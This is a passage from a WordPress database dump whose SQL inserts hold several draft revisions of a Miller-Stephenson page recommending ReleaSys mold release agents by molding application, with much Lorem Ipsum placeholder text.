src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 15:17:08', '2017-05-31 15:17:08', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4365, 3, '2017-05-31 15:34:13', '2017-05-31 15:34:13', '<h3 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h3>\r\nMiller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all play a key role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist at <strong>203-743-4447</strong> or submitting an inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a>\r\n\r\n&nbsp;\r\n<h2><strong>Advanced Composites/FRP </strong></h2>\r\n<div>\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" /><img class="alignleft wp-image-4351" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Modern composites and fiber-reinforced materials are high performance substrates demand innovative mold release solutions to facilitate consistent and cost-effective release characteristics.  Mold releases for this application typically need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  ReleaSys technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers. Simply coat, cure, and mold.\r\n\r\nMiller-Stephenson strongly recommends use of <strong>ReleaSys 9900</strong>, our water-based, no VOC, and rapidly curing release agent and <strong>ReleaSys 8900</strong>, our solvent-based, low odor semi-permanent release polymer.\r\n\r\n</div>\r\n&nbsp;\r\n<h2><strong>Rotational Plastics </strong></h2>\r\n<img class="wp-image-4360 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_507408157-800x534.jpg" width="205" height="137" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h2 style="text-align: left;"><strong>Polyurethane (Rigid, Elastomers, Flexible Foam, Skin)</strong></h2>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resilency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.  Miller-Stephenson\'s ReleaSys release systems has specially  formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.\r\n\r\nMiller-Stephenson strongly recommends ReleaSys 8800 or ReleaSys 9800 for water-based applications and ReleaSys 8900 if solvent-based carrier fluids is desired.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 15:34:13', '2017-05-31 15:34:13', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4366, 3, '2017-05-31 15:36:22', '2017-05-31 15:36:22', '', 'Polyurethane release agent', 'ReleaSys 9800\nReleaSys 9900', 'inherit', 'closed', 'closed', '', 'shutterstock_505351012', '', '', '2017-06-01 14:26:21', '2017-06-01 14:26:21', '', 4321, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_505351012.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4367, 3, '2017-05-31 15:39:20', '2017-05-31 15:39:20', '<h3 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h3>\r\nMiller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all play a key role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist at <strong>203-743-4447</strong> or submitting an inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a>\r\n\r\n&nbsp;\r\n<h2><strong>Advanced Composites/FRP </strong></h2>\r\n<div>\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" /><img class="wp-image-4351 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Modern composites and fiber-reinforced materials are high performance substrates demand innovative mold release solutions to facilitate consistent and cost-effective release characteristics.  Mold releases for this application typically need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  ReleaSys technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers. Simply coat, cure, and mold.\r\n\r\nMiller-Stephenson strongly recommends use of <strong>ReleaSys 9900</strong>, our water-based, no VOC, and rapidly curing release agent and <strong>ReleaSys 8900</strong>, our solvent-based, low odor semi-permanent release polymer.\r\n\r\n</div>\r\n&nbsp;\r\n<h2><strong>Rotational Plastics (Rotomolding)</strong></h2>\r\n<img class="wp-image-4360 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_507408157-800x534.jpg" width="205" height="137" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />\r\n\r\nRotational Molding is both an industry and a process that is based in the use of thermoplastic resins.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2 style="text-align: left;"><strong>Polyurethane (Rigid, Elastomers, Flexible Foam, Skin)</strong></h2>\r\n<p style="text-align: left;"><img class="wp-image-4366  alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_505351012-800x650.jpg" width="199" height="162" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resilency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.  Miller-Stephenson\'s ReleaSys release systems has specially  formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.\r\n\r\nMiller-Stephenson strongly recommends<strong> ReleaSys 8800</strong> or <strong>ReleaSys 9800</strong> for water-based applications and <strong>ReleaSys 8900</strong> if solvent-based carrier fluids is desired.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 15:39:20', '2017-05-31 15:39:20', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4368, 3, '2017-05-31 16:27:21', '2017-05-31 16:27:21', '<h3 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h3>\r\nMiller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all play a key role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist at <strong>203-743-4447</strong> or submitting an inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a>\r\n\r\n&nbsp;\r\n<h2><strong>Advanced Composites/FRP </strong></h2>\r\n<div>\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" /><img class="wp-image-4351 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Modern composites and fiber-reinforced materials are high performance substrates demand innovative mold release solutions to facilitate consistent and cost-effective release characteristics.  Mold releases for this application typically need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  ReleaSys technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers. Simply coat, cure, and mold.\r\n\r\nMiller-Stephenson strongly recommends use of <strong>ReleaSys<em>™</em> 9900</strong>, our water-based, no VOC, and rapidly curing release agent and <strong>ReleaSys<em>™</em> 8900</strong>, our solvent-based, low odor semi-permanent release polymer.\r\n\r\n</div>\r\n&nbsp;\r\n<h2><strong>Rotational Plastics (Rotomolding)</strong></h2>\r\n<img class="wp-image-4360 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_507408157-800x534.jpg" width="205" height="137" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />\r\n\r\nRotational Molding is both an industry and a process that is based in the use of thermoplastic resins. The rotational molding industry continues to gain popularity around the globe, and a wider variety of thermoplastic molding resins (beyond polyethylene) is becoming available. In response to this ever-evolving industry, Miller-Stephenson has developed a robust and innovative portfolio of release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter cycles using higher temperatures and increasing complex molds with tighter tolerances. Miller-Stephenson\'s ReleaSys product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application\r\n\r\nMiller-Stephenson strongly recommend <strong>ReleaSys<em>™</em> RM</strong> and <strong>ReleaSys<em>™</em> 9900</strong> for all rotational molding resins and application techniques.\r\n<h2 style="text-align: left;"><strong>Polyurethane (Rigid, Elastomers, Flexible Foam, Skin)</strong></h2>\r\n<p style="text-align: left;"><img class="wp-image-4366 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_505351012-800x650.jpg" width="199" height="162" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resilency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.  Miller-Stephenson\'s ReleaSys release systems has specially  formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.\r\n\r\nMiller-Stephenson strongly recommends<strong> ReleaSys<em>™</em> 8800</strong> or <strong>ReleaSys<em>™</em> 9800</strong> for water-based applications and <strong>ReleaSys 8900</strong> if solvent-based carrier fluids is desired.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, 